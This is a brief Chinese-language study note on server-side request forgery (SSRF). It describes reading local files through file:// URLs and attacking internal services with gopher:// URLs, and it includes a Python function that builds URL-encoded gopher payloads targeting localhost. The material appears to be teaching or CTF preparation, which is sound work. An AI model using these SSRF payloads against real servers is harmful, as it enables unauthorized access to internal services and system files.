07-WEB-SSRF

服务端请求伪造

SSRF利用技巧

SSRF简介

服务端请求伪造，是一种由服务器发起请求的一个漏洞，让服务器去请求通常请求不到的东西，一般用来在外网探测或攻击内网服务

漏洞利用

1.读取系统文件

​ file://+文件绝对路径 进行文件读取

2.攻击内网服务

​ gopher://协议 gopher://地址：端口/_ tcp数据

​ Gopher数据包的构造

​ 写好原始数据

​ 把换行符\n替换为\r\n

​ 将原始数据包进行URL编码，然后放在gopher://地址：端口/_后面

from urllib.parse import quote as urlencode
def makegopher():
    raw='''GET / HTTP/1.1
Host: 127.0.0.1：12345
User-Agent: curl/7.77.0
Accept: */*'''.replace('\n','\r\n')
    stream=urlencode(raw)
    return "gopher://127.0.0.1:1234/_"+stream